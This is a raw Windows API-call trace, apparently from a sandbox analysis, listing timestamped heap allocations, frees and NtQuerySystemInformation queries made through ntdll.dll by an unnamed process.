[0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489c0540 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949ae18b0 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bce870 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1ac0 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a060 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c7edd0 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0eea0 | out: hHeap=0x269489b0000) returned 1 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.315] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c92600 | out: hHeap=0x269489b0000) returned 1 [0299.315] GetProcessHeap () returned 0x269489b0000 [0299.315] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcdd70 | out: hHeap=0x269489b0000) returned 1 [0299.315] GetProcessHeap () returned 0x269489b0000 [0299.315] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1920 | out: hHeap=0x269489b0000) returned 1 [0299.315] GetProcessHeap () returned 0x269489b0000 [0299.315] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c59fe0 | out: hHeap=0x269489b0000) returned 1 [0299.346] GetProcessHeap () returned 0x269489b0000 [0299.347] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c24430 | out: hHeap=0x269489b0000) returned 1 [0299.349] GetProcessHeap () returned 0x269489b0000 [0299.349] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489c0d90 | out: hHeap=0x269489b0000) returned 1 [0299.349] GetProcessHeap () returned 0x269489b0000 [0299.349] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c245c0 | out: hHeap=0x269489b0000) returned 1 [0299.349] GetProcessHeap () returned 0x269489b0000 [0299.349] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcbdd0 | out: hHeap=0x269489b0000) returned 1 [0299.349] GetProcessHeap () returned 0x269489b0000 [0299.349] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d19b0 | out: hHeap=0x269489b0000) returned 1 [0299.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.350] GetProcessHeap () returned 0x269489b0000 [0299.350] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bccf00 [0299.350] GetProcessHeap () returned 0x269489b0000 [0299.350] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1a30 [0299.351] GetProcessHeap () returned 0x269489b0000 [0299.352] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x122) returned 0x269489c07a0 [0299.356] GetProcessHeap () returned 0x269489b0000 [0299.357] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x130) returned 0x26949b34030 [0299.358] GetProcessHeap () returned 0x269489b0000 [0299.359] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c5a1e0 [0299.359] GetProcessHeap () returned 0x269489b0000 [0299.359] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x138) returned 0x26949c7edd0 [0299.360] GetProcessHeap () returned 0x269489b0000 [0299.360] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc8d0 [0299.360] GetProcessHeap () returned 0x269489b0000 [0299.361] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d19a0 [0299.361] GetProcessHeap () returned 0x269489b0000 [0299.361] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949ae18b0 | out: hHeap=0x269489b0000) returned 1 [0299.366] GetProcessHeap () returned 0x269489b0000 [0299.367] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1ec) returned 0x26949710800 [0299.371] GetProcessHeap () returned 0x269489b0000 [0299.371] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x2f4) returned 0x2694997b1e0 [0299.372] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f0e8 | out: phModule=0xa78217f0e8*=0x7ffcea380000) returned 1 [0299.372] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0299.372] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f210, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f210, ResultLength=0x0) returned 0x0 [0299.373] GetProcessHeap () returned 0x269489b0000 [0299.373] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c59fe0 [0299.373] GetProcessHeap () returned 0x269489b0000 [0299.373] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x78) returned 0x26949bac840 [0299.374] GetProcessHeap () returned 0x269489b0000 [0299.374] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bccc40 [0299.374] GetProcessHeap () returned 0x269489b0000 [0299.374] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1a70 [0299.375] GetProcessHeap () returned 0x269489b0000 [0299.375] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x68) returned 0x26949b9cf20 [0299.375] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949b34030 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c7edd0 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc8d0 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d19a0 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a1e0 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949710800 | out: hHeap=0x269489b0000) returned 1 [0299.376] GetProcessHeap () returned 0x269489b0000 [0299.376] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694997b1e0 | out: hHeap=0x269489b0000) returned 1 [0299.377] GetProcessHeap () returned 0x269489b0000 [0299.377] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bac840 | out: hHeap=0x269489b0000) returned 1 [0299.377] GetProcessHeap () returned 0x269489b0000 [0299.377] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bccc40 | out: hHeap=0x269489b0000) returned 1 [0299.377] GetProcessHeap () returned 0x269489b0000 [0299.377] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1a70 | out: hHeap=0x269489b0000) returned 1 [0299.377] GetProcessHeap () returned 0x269489b0000 [0299.377] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c59fe0 | out: hHeap=0x269489b0000) returned 1 [0299.377] GetProcessHeap () returned 0x269489b0000 [0299.377] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bacac0 | out: hHeap=0x269489b0000) returned 1 [0299.379] GetProcessHeap () returned 0x269489b0000 [0299.379] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489c07a0 | out: hHeap=0x269489b0000) returned 1 [0299.379] GetProcessHeap () returned 0x269489b0000 [0299.379] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949b9cf20 | out: hHeap=0x269489b0000) returned 1 [0299.380] GetProcessHeap () returned 0x269489b0000 [0299.380] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bccf00 | out: hHeap=0x269489b0000) returned 1 [0299.380] GetProcessHeap () returned 0x269489b0000 [0299.380] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1a30 | out: hHeap=0x269489b0000) returned 1 [0299.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x28, ResultLength=0x0) [0299.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.386] GetProcessHeap () returned 0x269489b0000 [0299.386] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bce710 [0299.386] GetProcessHeap () returned 0x269489b0000 [0299.387] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1a00 [0299.387] GetProcessHeap () returned 0x269489b0000 [0299.387] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfe) returned 0x26948a0d850 [0299.389] GetProcessHeap () returned 0x269489b0000 [0299.389] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x108) returned 0x26948a0eea0 [0299.389] GetProcessHeap () returned 0x269489b0000 [0299.389] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c59fe0 [0299.389] GetProcessHeap () returned 0x269489b0000 [0299.389] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x110) returned 0x26948a00b20 [0299.389] GetProcessHeap () returned 0x269489b0000 [0299.390] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bce7c0 [0299.390] GetProcessHeap () returned 0x269489b0000 [0299.390] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1c20 [0299.390] GetProcessHeap () returned 0x269489b0000 [0299.390] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0299.390] GetProcessHeap () returned 0x269489b0000 [0299.390] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1c4) returned 0x26949c7edd0 [0299.390] GetProcessHeap () returned 0x269489b0000 [0299.390] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfc) returned 0x26948a0d740 [0299.391] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f168 | out: phModule=0xa78217f168*=0x7ffcea380000) returned 1 [0299.391] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0299.391] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f290, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f290, ResultLength=0x0) returned 0x0 [0299.392] GetProcessHeap () returned 0x269489b0000 [0299.392] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c5a020 [0299.392] GetProcessHeap () returned 0x269489b0000 [0299.392] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x48) returned 0x26949c24430 [0299.392] GetProcessHeap () returned 0x269489b0000 [0299.392] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcbf30 [0299.392] GetProcessHeap () returned 0x269489b0000 [0299.392] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1c50 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.393] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x34) returned 0x26949c5a060 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.393] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0eea0 | out: hHeap=0x269489b0000) returned 1 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.393] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a00b20 | out: hHeap=0x269489b0000) returned 1 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.393] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bce7c0 | out: hHeap=0x269489b0000) returned 1 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.393] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1c20 | out: hHeap=0x269489b0000) returned 1 [0299.393] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c59fe0 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c7edd0 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0d740 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c24430 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcbf30 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1c50 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a020 | out: hHeap=0x269489b0000) returned 1 [0299.394] GetProcessHeap () returned 0x269489b0000 [0299.394] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c245c0 | out: hHeap=0x269489b0000) returned 1 [0299.395] GetProcessHeap () returned 0x269489b0000 [0299.395] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0d850 | out: hHeap=0x269489b0000) returned 1 [0299.395] GetProcessHeap () returned 0x269489b0000 [0299.395] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a060 | out: hHeap=0x269489b0000) returned 1 [0299.395] GetProcessHeap () returned 0x269489b0000 [0299.395] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bce710 | out: hHeap=0x269489b0000) returned 1 [0299.395] GetProcessHeap () returned 0x269489b0000 [0299.395] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1a00 | out: hHeap=0x269489b0000) returned 1 [0299.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.397] GetProcessHeap () returned 0x269489b0000 [0299.397] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc1f0 [0299.397] GetProcessHeap () returned 0x269489b0000 [0299.397] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1a50 [0299.397] GetProcessHeap () returned 0x269489b0000 [0299.397] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xb8) returned 0x269496c35d0 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc0) returned 0x26949733b50 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c5a1e0 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc8) returned 0x26949733cf0 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bce7c0 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1c70 [0299.398] GetProcessHeap () returned 0x269489b0000 [0299.398] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949734100 | out: hHeap=0x269489b0000) returned 1 [0299.399] GetProcessHeap () returned 0x269489b0000 [0299.399] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x17c) returned 0x26949795b50 [0299.399] GetProcessHeap () returned 0x269489b0000 [0299.399] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xdc) returned 0x269489bdd90 [0299.399] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f290 | out: phModule=0xa78217f290*=0x7ffcea380000) returned 1 [0299.400] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0299.400] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f348, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f348, ResultLength=0x0) returned 0x0 [0299.400] GetProcessHeap () returned 0x269489b0000 [0299.400] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c59fe0 [0299.400] GetProcessHeap () returned 0x269489b0000 [0299.400] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x28) returned 0x26949c69a30 [0299.400] GetProcessHeap () returned 0x269489b0000 [0299.400] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcdd70 [0299.400] GetProcessHeap () returned 0x269489b0000 [0299.400] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1bb0 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x14) returned 0x26949842c80 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949733b50 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949733cf0 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bce7c0 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1c70 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a1e0 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949795b50 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489bdd90 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c69a30 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcdd70 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1bb0 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c59fe0 | out: hHeap=0x269489b0000) returned 1 [0299.401] GetProcessHeap () returned 0x269489b0000 [0299.401] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c69ee0 | out: hHeap=0x269489b0000) returned 1 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269496c35d0 | out: hHeap=0x269489b0000) returned 1 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949842c80 | out: hHeap=0x269489b0000) returned 1 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc1f0 | out: hHeap=0x269489b0000) returned 1 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1a50 | out: hHeap=0x269489b0000) returned 1 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bccc40 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1a90 [0299.402] GetProcessHeap () returned 0x269489b0000 [0299.402] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc658) returned 0x269499bd010 [0299.403] GetProcessHeap () returned 0x269489b0000 [0299.403] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc660) returned 0x26949b83c10 [0299.406] GetProcessHeap () returned 0x269489b0000 [0299.406] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c59fe0 [0299.406] GetProcessHeap () returned 0x269489b0000 [0299.406] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc668) returned 0x269496056c0 [0299.407] GetProcessHeap () returned 0x269489b0000 [0299.407] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcdd70 [0299.407] GetProcessHeap () returned 0x269489b0000 [0299.407] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1c70 [0299.407] GetProcessHeap () returned 0x269489b0000 [0299.407] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949ae5a20 | out: hHeap=0x269489b0000) returned 1 [0299.407] GetProcessHeap () returned 0x269489b0000 [0299.407] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xc71c) returned 0x26949611d30 [0299.408] GetProcessHeap () returned 0x269489b0000 [0299.408] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xcc) returned 0x269497208f0 [0299.408] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f310 | out: phModule=0xa78217f310*=0x7ffcea380000) returned 1 [0299.408] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0299.408] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f368, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f368, ResultLength=0x0) returned 0x0 [0299.474] GetProcessHeap () returned 0x269489b0000 [0299.475] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c5a020 [0299.475] GetProcessHeap () returned 0x269489b0000 [0299.475] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x18) returned 0x26949842a40 [0299.475] GetProcessHeap () returned 0x269489b0000 [0299.475] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcbf30 [0299.475] GetProcessHeap () returned 0x269489b0000 [0299.475] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1c50 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d19b0 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949b83c10 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269496056c0 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcdd70 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1c70 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c59fe0 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949611d30 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.476] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269497208f0 | out: hHeap=0x269489b0000) returned 1 [0299.476] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949842a40 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcbf30 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1c50 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c5a020 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949842d00 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499bd010 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d19b0 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bccc40 | out: hHeap=0x269489b0000) returned 1 [0299.477] GetProcessHeap () returned 0x269489b0000 [0299.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1a90 | out: hHeap=0x269489b0000) returned 1 [0299.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x50, ResultLength=0x0) [0299.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x50, ResultLength=0x0) 